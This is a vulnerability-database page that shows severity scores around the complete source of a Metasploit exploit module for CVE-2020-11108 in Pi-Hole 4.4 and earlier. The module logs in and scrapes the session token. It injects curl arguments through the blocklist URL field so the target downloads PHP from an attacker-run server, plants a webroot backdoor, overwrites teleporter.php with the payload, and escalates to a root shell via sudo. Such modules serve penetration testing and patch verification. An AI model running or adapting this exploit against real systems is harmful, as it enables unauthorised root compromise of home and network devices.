8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9 High
AI Score
Confidence
High
9 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
0.958 High
EPSS
Percentile
99.4%
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Pi-Hole heisenbergCompensator Blocklist OS Command Execution',
'Description' => %q{
This exploits a command execution in Pi-Hole <= 4.4. A new blocklist is added, and then an
update is forced (gravity) to pull in the blocklist content. PHP content is then written
to a file within the webroot. Phase 1 writes a sudo pihole command to launch teleporter,
effectively running a priv esc. Phase 2 writes our payload to teleporter.php, overwriting,
the content. Lastly, the phase 1 PHP file is called in the web root, which launches
our payload in teleporter.php with root privileges.
},
'License' => MSF_LICENSE,
'Author' =>
[
'h00die', # msf module
'Nick Frichette' # original PoC, discovery
],
'References' =>
[
['EDB', '48443'],
['EDB', '48442'],
['URL', 'https://frichetten.com/blog/cve-2020-11108-pihole-rce/'],
['URL', 'https://github.com/frichetten/CVE-2020-11108-PoC'],
['CVE', '2020-11108']
],
'Platform' => ['php'],
'Privileged' => true,
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DisclosureDate' => 'May 10 2020',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES],
'Reliability' => [REPEATABLE_SESSION]
}
)
)
# set the default port, and a URI that a user can set if the app isn't installed to the root
register_options(
[
Opt::RPORT(80),
OptPort.new('SRVPORT', [true, 'Web Server Port, must be 80', 80]),
OptString.new('PASSWORD', [ false, 'Password for Pi-Hole interface', '']),
OptString.new('TARGETURI', [ true, 'The URI of the Pi-Hole Website', '/'])
]
)
end
def setup
super
@stage = 0
end
def on_request_uri(cli, request)
if request.method == 'GET'
vprint_status('Received GET request. Responding')
send_response(cli, rand_text_alphanumeric(5..10))
return
end
case @stage
when 0
vprint_status('(1/2) Sending priv esc trigger')
send_response(cli, %q{<?php shell_exec("sudo pihole -a -t") ?>})
@stage += 1
when 1
vprint_status('(2/2) Sending root payload')
send_response(cli, payload.encoded)
@stage = 0
else
send_response(cli, rand_text_alphanumeric(5..10))
vprint_status("Server received default request for #{request.uri}")
end
end
def check
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin', 'index.php'),
'method' => 'GET'
)
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200
# <b>Pi-hole Version <\/b> v4.3.2 <b>
# <b>Pi-hole Version </b> v4.3.2 <a class="alert-link lookatme" href="https://github.com/pi-hole/pi-hole/releases" target="_blank">(Update available!)</a> <b>
%r{<b>Pi-hole Version\s*</b>\s*v?(?<version>[\d\.]+).*<b>} =~ res.body
if version && Gem::Version.new(version) <= Gem::Version.new('4.4')
vprint_good("Version Detected: #{version}")
return CheckCode::Appears
else
vprint_bad("Version Detected: #{version}")
return CheckCode::Safe
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
CheckCode::Safe
end
def add_blocklist(file, token, cookie)
# according to the writeup, if you have a port, the colon gets messed up in the encoding.
# also, looks like if you have a path (/file.php), it won't trigger either, or the / gets
# messed with.
data = {
'newuserlists' => %(http://#{datastore['SRVHOST']}#" -o #{file} -d "),
'field' => 'adlists',
'token' => token,
'submit' => 'saveupdate'
}
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),
'method' => 'POST',
'cookie' => cookie,
'vars_get' => {
'tab' => 'blocklists'
},
'data' => data.to_query
)
end
def update_gravity(cookie)
vprint_status('Forcing gravity pull')
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin', 'scripts', 'pi-hole', 'php', 'gravity.sh.php'),
'cookie' => cookie
)
end
def execute_shell(backdoor_name, cookie)
vprint_status('Popping root shell')
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin', 'scripts', 'pi-hole', 'php', backdoor_name),
'cookie' => cookie
)
end
def login(cookie)
vprint_status('Login required, attempting login.')
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),
'cookie' => cookie,
'vars_get' => {
'tab' => 'blocklists'
},
'vars_post' => {
'pw' => datastore['PASSWORD']
},
'method' => 'POST'
)
end
def exploit
if check != CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
end
if datastore['SRVPORT'] != 80
fail_with(Failure::BadConfig, 'SRVPORT must be set to 80 for exploitation to be successful')
end
if datastore['SRVHOST'] == '0.0.0.0'
fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful')
end
start_service({ 'Uri' => {
'Proc' => proc do |cli, req|
on_request_uri(cli, req)
end,
'Path' => '/'
} })
begin
# get cookie
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin', 'index.php')
)
cookie = res.get_cookies
print_status("Using cookie: #{cookie}")
# get token
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),
'cookie' => cookie,
'vars_get' => {
'tab' => 'blocklists'
}
)
# check if we got hit by a login prompt
if res && res.body.include?('Sign in to start your session')
res = login(cookie)
end
if res && res.body.include?('Sign in to start your session')
fail_with(Failure::BadConfig, 'Incorrect Password')
end
# <input type="hidden" name="token" value="t51q3YuxWT873Nn+6lCyMG4Lg840gRCgu03akuXcvTk=">
# may also include /
%r{name="token" value="(?<token>[\w+=/]+)">} =~ res.body
unless token
fail_with(Failure::UnexpectedReply, 'Unable to find token')
end
print_status("Using token: #{token}")
# plant backdoor
backdoor_name = "#{rand_text_alphanumeric 5..10}.php"
register_file_for_cleanup backdoor_name
print_status('Adding backdoor reference')
add_blocklist(backdoor_name, token, cookie)
# update gravity
update_gravity(cookie)
if @stage == 0
print_status('Sending 2nd gravity update request.')
update_gravity(cookie)
end
# plant root upgrade
print_status('Adding root reference')
add_blocklist('teleporter.php', token, cookie)
# update gravity
update_gravity(cookie)
if @stage == 1
print_status('Sending 2nd gravity update request.')
update_gravity(cookie)
end
# pop shell
execute_shell(backdoor_name, cookie)
print_status("Blocklists must be removed manually from #{normalize_uri(target_uri.path, 'admin', 'settings.php')}?tab=blocklists")
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
end
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9 High
AI Score
Confidence
High
9 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
0.958 High
EPSS
Percentile
99.4%